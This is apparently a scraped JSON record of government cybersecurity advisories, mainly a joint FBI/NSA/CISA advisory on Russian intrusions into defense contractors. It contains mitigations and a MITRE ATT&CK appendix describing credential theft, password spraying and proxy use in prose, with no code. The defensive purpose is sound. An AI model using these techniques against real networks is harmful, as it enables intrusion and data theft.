wait 10 hours, and then follow with a second krbtgt password reset). The krbtgt password resets may take a long time to propagate fully on large AD environments. Refer to Microsoft\u2019s [AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>) guidance and automation script for additional information. [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)][[5](<https://github.com/microsoft/New-KrbtgtKeys.ps1>)]_\n * **Reset all domain user, admin, and service account passwords. **\n\n_**Note:** for guidance on evicting advanced persistent threat (APT) actors from cloud and enterprise environments, refer to CISA Analysis Report [Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/Microsoft 365 (M365) Compromise](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a>). Although this guidance was drafted for federal agencies compromised by the Russian Foreign Intelligence Service (SVR) via the [SolarWinds Orion supply chain compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>), the steps provided in the Eviction Phase are applicable for all organizations crafting eviction plans for suspected APT actors._\n\n### Mitigations\n\nThe FBI, NSA, and CISA encourage all CDCs, with or without evidence of compromise, to apply the following mitigations to reduce the risk of compromise by this threat actor. While these mitigations are not intended to be all-encompassing, they address common TTPs observed in these intrusions and will help to mitigate against common malicious activity. \n\n#### **Implement Credential Hardening**\n\n##### **_Enable Multifactor Authentication_**\n\n * **Enable multifactor authentication (MFA)** for all users, without exception. Subsequent authentication may not require MFA, enabling the possibility to bypass MFA by reusing single factor authentication assertions (e.g., Kerberos authentication). Reducing the lifetime of assertions will cause account re-validation of their MFA requirements.[[6](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend%20Privileges%20and%20Accounts%20-%20Copy.pdf>)] Service accounts should not use MFA. Automation and platform features (e.g., Group Managed Service Accounts, gMSA) can provide automatic and periodic complex password management for service accounts, reducing the threat surface against single factor authentication assertions.[[7](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>)] \n\n##### **_Enforce Strong, Unique Passwords_**\n\n * **Require accounts to have strong, unique passwords.** Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n * **Enable password management functions**, such as Local Administrator Password Solution (LAPS), for local administrative accounts. This will reduce the burden of users managing passwords and encourage them to have strong passwords.\n\n##### **_Introduce Account Lockout and Time-Based Access Features_**\n\n * **Implement time-out and lock-out features** in response to repeated failed login attempts.\n * **Configure time-based access for accounts set at the admin level and higher. **For example, the Just-In-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When the account is needed, individual users submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.\n\n##### **_Reduce Credential Exposure_**\n\n * **Use virtualization solutions on modern hardware and software** to ensure credentials are securely stored, and protect credentials via capabilities, such as Windows Defender Credential Guard (CredGuard) and Trusted Platform Module (TPM).[[8](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage%20Modern%20Hardware%20Security%20Features%20-%20Copy.pdf>)] Protecting domain credentials with CredGuard requires configuration and has limitations in protecting other types of credentials (e.g., WDigest and local accounts).[[9](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>)][[10](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>)] CredGuard uses TPMs to protect stored credentials. TPMs function as a system integrity observer and trust anchor ensuring the integrity of the boot sequence and mechanisms (e.g., UEFI Secure Boot). Installation of Windows 11 requires TPM v2.0.[[11](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>)] Disabling WDigest and rolling expiring NTLM secrets in smartcards will further protect other credentials not protected by CredGuard.[[12](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>)][[13](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>)]\n\n#### **Establish Centralized Log Management**\n\n * **Create a centralized log management system. **Centralized logging applications allow network defenders to look for anomalous activity, such as out-of-place communications between devices or unaccountable login failures, in the network environment. \n * Forward all logs to a SIEM tool.\n * Ensure logs are searchable.\n * Retain critical and historic network activity logs for a minimum of 180 days. \n * **If using M365, enable Unified Audit Log (UAL)**\u2014M365\u2019s logging capability\u2014which contains events from Exchange Online, SharePoint online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other M365 services. \n * **Correlate logs, including M365 logs, from network and host security devices. **This correlation will help with detecting anomalous activity in the network environment and connecting it with potential anomalous activity in M365. \n\nIn addition to setting up centralized logging, organizations should:\n\n * **Ensure PowerShell logging is turned on. **Threat actors often use PowerShell to hide their malicious activities.[14] \n * **Update PowerShell instances to version 5.0 or later **and uninstall all earlier versions of PowerShell. Logs from prior versions are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities. \n * **Confirm PowerShell 5.0 instances have module, script block, and transcription logging** enabled.\n * **Monitor remote access/Remote Desktop Protocol (RDP) logs** and disable unused remote access/RDP ports.\n\n#### **Initiate a Software and Patch Management Program **\n\n * **Consider using a centralized patch management system.** Failure to deploy software patches in a timely manner makes an organization a target of opportunity, increasing its risk of compromise. Organizations can ensure timely patching of software vulnerabilities by implementing an enterprise-wide software and patch management program.[[15](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf>)] \n * If an organization is unable to update all software shortly after a patch is released, **prioritize patches for CVEs that are already known **to be exploited or that would be accessible to the largest number of potential adversaries (such as internet-facing systems). \n * **Subscribe to [CISA cybersecurity notifications and advisories](<https://us-cert.cisa.gov/ncas>)** to keep up with known exploited vulnerabilities, security updates, and threats. This will assist organizations in maintaining situational awareness of critical software vulnerabilities and, if applicable, associated exploitation. \n * **Sign up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)**, including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IPs for accessible services and vulnerabilities.\n\n#### **Employ Antivirus Programs **\n\n * **Ensure that antivirus applications are installed on all organizations\u2019 computers** and are configured to prevent spyware, adware, and malware as part of the operating system security baseline. \n * **Keep virus definitions up to date.**\n * **Regularly monitor antivirus scans.**\n\n#### **Use Endpoint Detection and Response Tools **\n\n * **Utilize endpoint detection and response (EDR) tools.** These tools allow a high degree of visibility into the security status of endpoints and can be an effective defense against threat actors. EDR tools are particularly useful for detecting lateral movement, as they have insight into common and uncommon network connections for each host. \n\n#### **Maintain Rigorous Configuration Management Programs **\n\n * **Audit configuration management programs **to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Having a robust configuration program hinders sophisticated threat operations by limiting the effectiveness of opportunistic attacks.[[16](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively%20Manage%20Systems%20and%20Configurations.docx%20-%20Copy.pdf>)] \n\n#### **Enforce the Principle of Least Privilege**\n\n * **Apply the principle of least privilege. **Administrator accounts should have the minimum permissions they need to do their tasks. This can reduce the impact if an administrator account is compromised. \n * **For M365, assign administrator roles to role-based access control (RBAC)** to implement the principle of least privilege. Given its high level of default privilege, you should only use the Global Administrator account when absolutely necessary. Using Azure AD\u2019s numerous other built-in administrator roles instead of the Global Administrator account can limit assigning unnecessary privileges. _**Note:** refer to the Microsoft documentation, [Azure AD built-in roles](<https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles>), for more information about Azure AD. _\n * **Remove privileges not expressly required by an account\u2019s function or role. **\n * **Ensure there are unique and distinct administrative accounts** for each set of administrative tasks. \n * **Create non-privileged accounts for privileged users, **and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).\n * **Reduce the number of domain and enterprise administrator accounts, **and remove all accounts that are unnecessary.\n * **Regularly audit administrative user accounts.**\n * **Regularly audit logs to ensure new accounts are legitimate users.**\n * **Institute a group policy that disables remote interactive logins,** and use Domain Protected Users Group.\n\nTo assist with identifying suspicious behavior with administrative accounts:\n\n * **Create privileged role tracking.**\n * **Create a change control process** for all privilege escalations and role changes on user accounts.\n * **Enable alerts on privilege escalations and role changes.**\n * **Log privileged user changes** in the network environment, and create an alert for unusual events.\n\n#### **Review Trust Relationships**\n\n * **Review existing trust relationships with IT service providers,** such as managed service providers (MSPs) and cloud service providers (CSPs). Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data. \n * **Remove unnecessary trust relationships. **\n * **Review contractual relationships **with all service providers, and ensure contracts include: \n * Security controls the customer deems appropriate. \n * Appropriate monitoring and logging of provider-managed customer systems.\n * Appropriate monitoring of the service provider\u2019s presence, activities, and connections to the customer network.\n * Notification of confirmed or suspected security events and incidents occurring on the provider\u2019s infrastructure and administrative networks.\n\n_**Note: **review CISA\u2019s page on [APTs Targeting IT Service Provider Customers](<https://www.cisa.gov/uscert/APTs-Targeting-IT-Service-Provider-Customers>) and [CISA Insights: Mitigations and Hardening Guidance for MSPs and Small and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) for additional recommendations for MSP and CSP customers._\n\n#### **Encourage Remote Work Environment Best Practices**\n\nWith the increase in remote work and use of VPN services due to COVID-19, the FBI, NSA, and CISA encourage regularly monitoring remote network traffic, along with employing the following best practices._ **Note:** for additional information, see joint NSA-CISA Cybersecurity Information Sheet: [Selecting and Hardening Remote Access VPN Solutions](<https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF>)._\n\n * **Regularly update VPNs, network infrastructure devices, and devices used for remote work environments **with the latest software patches and security configurations.\n * **When possible, require MFA on all VPN connections. **Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, mandate that employees engaging in remote work use strong passwords.\n * **Monitor network traffic for unapproved and unexpected protocols.**\n * **Reduce potential attack surfaces by discontinuing unused VPN servers** that may be used as a point of entry by adversaries.\n\n#### **Establish User Awareness Best Practices**\n\nCyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI, NSA, and CISA recommend the following best practices to improve employee operational security when conducting business:\n\n * **Provide end user awareness and training. **To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and how they are delivered. Also, provide users with training on information security principles and techniques.\n * **Inform employees of the risks of social engineering attacks,** e.g., risks associated with posting detailed career information to social or professional networking sites.\n * **Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyber intrusion** to help quickly and efficiently identify threats and employ mitigation strategies.\n\n#### **Apply Additional Best Practice Mitigations**\n\n * **Deny atypical inbound activity from known anonymization services, **including commercial VPN services and The Onion Router (TOR).\n * **Impose listing policies for applications and remote access** that only allow systems to execute known and permitted programs under an established security policy.\n * **Identify and create offline backups for critical assets.**\n * **Implement network segmentation.**\n * **Review CISA Alert **[AA20-120A: Microsoft Office 365 Security Recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa20-120a>) for additional recommendations on hardening M365 cloud environments.\n\n### Rewards for Justice Program\n\nIf you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State\u2019s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which the Department is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact (202) 702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details, refer to [rewardsforjustice.net](<https://rewardsforjustice.net/terrorist-rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>).\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. The FBI, NSA, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, NSA, or CISA. \n\n### Contact Information\n\nTo report suspicious activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:cywatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:central@cisa.gov>). For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at (410) 854-4200 or [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). Defense Industrial Base companies may additionally sign up for NSA\u2019s free cybersecurity services, including Protective DNS, vulnerability scanning, and threat intelligence collaboration at [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>). \n\n### Appendix: Detailed Tactics, Techniques, and Procedures\n\n#### **Reconnaissance** [[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. The adversary is known for harvesting login credentials [[T1589.001](<https://attack.mitre.org/techniques/T1589/001>)].[[17](<https://attack.mitre.org/groups/G0007>)]\n\nID | **Name** | **Description** \n---|---|--- \nT1589.001 | Gather Victim Identity Information: Credentials | Adversaries may gather credentials that can be used during targeting. \n \n#### **Initial Access **[[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. For example, the adversary may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[18](<https://attack.mitre.org/groups/G0007>)] These specific actors obtained and abused credentials of domain [[T1078.002](<https://attack.mitre.org/techniques/T1078/002>)] and cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)].[[19](<https://attack.mitre.org/software/S0154/>)] The actors also used external remote services to gain access to systems [[T1133](<https://attack.mitre.org/techniques/T1133>)].[20] The adversary took advantage of weaknesses in internet-facing servers and conducted SQL injection attacks against organizations' external websites [[T1190](<https://attack.mitre.org/techniques/T1190>)].[[21](<https://attack.mitre.org/groups/G0007>)] Finally, they sent spearphishing emails with a malicious link in an attempt to gain access [[T1566.002](<https://attack.mitre.org/techniques/T1566/002>)].[22] \n\n\nID | Name | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. \nT1078.002 | Valid Accounts: Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \nT1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \nT1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network. \nT1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. \nT1566.002 | Phishing: Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. \n \n#### **Persistence **[[TA0003](<https://attack.mitre.org/tactics/TA0003>)]\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[23](<https://attack.mitre.org/groups/G0007>)] \n\nID | **Name ** | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \n#### **Privilege Escalation** [[TA0004](<https://attack.mitre.org/tactics/TA0004>)]\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[24](<https://attack.mitre.org/groups/G0007>)] Specifically in this case, credentials of cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)] were obtained and abused.[[25](<https://attack.mitre.org/software/S0154/>)] \n\nID | Name | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. \nT1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \n#### **Defense Evasion** [[TA0005](<https://attack.mitre.org/tactics/TA0005>)]\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. The adversary made its executables and files difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit [[T1027](<https://attack.mitre.org/techniques/T1027>)].[[26](<https://attack.mitre.org/software/S0410/>)] \n\n\nID | Name | Description \n---|---|--- \nT1027 | Obfuscated Files or Information | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. \n \n#### **Credential Access **[[TA0006](<https://attack.mitre.org/tactics/TA0006>)]\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. The adversary attempted to access or create a copy of the Active Directory (AD) domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights [[T1003.003](<https://attack.mitre.org/techniques/T1003/003>)].[[27](<https://attack.mitre.org/software/S0250/>)] The adversary also used a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials [[T1110.003](<https://attack.mitre.org/techniques/T1110/003>)].[[28](<https://attack.mitre.org/groups/G0007>)] \n\nID | Name | Description \n---|---|--- \nT1003.003 | OS Credential Dumping: NTDS | Adversaries may attempt to access or create a copy of the Active Directory domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. \nT1110.003 | Brute Force: Password Spraying | Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. \n \n#### **Discovery **[[TA0007](<https://attack.mitre.org/tactics/TA0007>)]\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. The adversary enumerated files and directories or searched in specific locations of a host or network share for certain information within a file system [[T1083](<https://attack.mitre.org/techniques/T1083>)].[29] In addition, the adversary attempted to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain or forest environments [[T1482](<https://attack.mitre.org/techniques/T1482>)].[30] \n\nID | Name | Description \n---|---|--- \nT1083 | File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \nT1482 | Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. \n \n**Collection [[TA0009](<https://attack.mitre.org/tactics/TA0009>)]**\n\nCollection consists of both the techniques adversaries may use to gather information and the sources that information is collected from that are relevant to the adversary's objectives. The adversary leverages information repositories, such as SharePoint, to mine valuable information [[T1213.002](<https://attack.mitre.org/techniques/T1213/002>)].[[31](<https://attack.mitre.org/groups/G0007>)] \n\nID | Name | Description \n---|---|--- \nT1213.002 | Data from Information Repositories: SharePoint | Adversaries may leverage the SharePoint repository as a source to mine valuable information. \n \n**Command and Control [[TA0011](<https://attack.mitre.org/tactics/TA0011>)]**\n\nCommand and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. The adversary chained together multiple proxies to disguise the source of malicious traffic. In this case, TOR and VPN servers are used as multi-hop proxies to route C2 traffic and obfuscate their activities [[T1090.003](<https://attack.mitre.org/techniques/T1090/003>)].[[32](<https://attack.mitre.org/groups/G0007>)] \n\n\nID | Name | Description \n---|---|--- \nT1090.003 | Proxy: Multi-hop Proxy | To disguise the source of malicious traffic, adversaries may chain together multiple proxies. \n \n### Additional Resources\n\n[1] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021. \n[2] NSA Cybersecurity Advisory: [Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>), 7 October 2019. \n[3] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021. \n[4] Microsoft Article: [AD Forest Recovery \u2013 Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>), 29 July 2021. \n[5] Microsoft GitHub: [New-KrbtgtKeys.ps1](<https://github.com/microsoft/New-KrbtgtKeys.ps1>), 14 May 2020. \n[6] NSA Cybersecurity Information: [Defend Privileges and Accounts](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend%20Privileges%20and%20Accounts%20-%20Copy.pdf>), August 2019. \n[7] Microsoft Article: [Group Managed Service Accounts Overview](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>), 29 July 2021. \n[8] NSA Cybersecurity Information: [Leverage Modern Hardware Security Features](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage%20Modern%20Hardware%20Security%20Features%20-%20Copy.pdf>), August 2019. \n[9] Microsoft Article: [Protect derived domain credentials with Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>), 3 December 2021. \n[10] Microsoft Article: [Windows Defender Credential Guard protection limits](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>), 3 December 2021. \n[11] Microsoft Article: [Windows 11 requirements](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>), 30 November 2021. \n[12] Microsoft Blog Post: [The Importance of KB2871997 and KB2928120 for Credential Protection](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>), 20 September 2021. \n[13] Microsoft Article: [What\u2019s New in Credential Protection](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>), 7 January 2022. \n[14] NSA Cybersecurity Factsheet: [PowerShell: Security Risks and Defenses](<https://www.iad.gov/iad/library/ia-guidance/security-tips/powershell-security-risks-and-defenses.cfm>), 1 December 2016. \n[15] NSA Cybersecurity Information: [Update and Upgrade Software Immediately](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf>), August 2019. \n[16] NSA Cybersecurity Information: [Actively Manage Systems and Configurations](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively%20Manage%20Systems%20and%20Configurations.docx%20-%20Copy.pdf>), August 2019. \n[17] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[18] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[19] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[20] Based on technical information shared by Mandiant. \n[21] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[22] Based on technical information shared by Mandiant. \n[23] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[24] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[25] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[26] MITRE Software: [Fysbis](<https://attack.mitre.org/software/S0410/>), 6 November 2020. \n[27] MITRE Software: [Koadic](<https://attack.mitre.org/software/S0250/>), 30 March 2020. \n[28] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[29] Based on technical information shared by Mandiant. \n[30] Based on technical information shared by Mandiant. \n[31] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[32] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.\n\n### Revisions\n\nFebruary 16, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T12:00:00", "type": "ics", "title": "Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144", "CVE-2023-26360"], "modified": "2022-02-16T12:00:00", "id": "AA22-047A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T12:50:04", "description": "#### Actions to take today to mitigate cyber threats from ransomware:\n\n 1. Prioritize remediating known exploited vulnerabilities.\n 2. Train users to recognize and report phishing attempts.\n 3. Enable and enforce multifactor authentication.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-11-13T12:00:00", "type": "ics", "title": "#StopRansomware: Royal Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2023-11-13T12:00:00", "id": "AA23-061A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:58:38", "description": "### Summary\n\n_**Immediate Actions WWS Facilities Can Take Now to Protect Against Malicious Cyber Activity** \n\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)._ \n_\u2022 If you use[ RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it. \n\u2022 __Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>)._ \n\u2022 _Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\n__**Note:** This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, version 9. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.__\n\nThis joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Agency (CISA), the Environmental Protection Agency (EPA), and the National Security Agency (NSA) to highlight ongoing malicious cyber activity\u2014by both known and unknown actors\u2014targeting the information technology (IT) and operational technology (OT) networks, systems, and devices of [U.S. Water and Wastewater Systems (WWS) Sector facilities](<https://www.cisa.gov/water-and-wastewater-systems-sector>). This activity\u2014which includes attempts to compromise system integrity via unauthorized access\u2014threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities. **Note:** although cyber threats across [critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) are increasing, this advisory does not intend to indicate greater targeting of the WWS Sector versus others.\n\nTo secure WWS facilities\u2014including Department of Defense (DoD) water treatment facilities in the United States and abroad\u2014against the TTPs listed below, CISA, FBI, EPA, and NSA strongly urge organizations to implement the measures 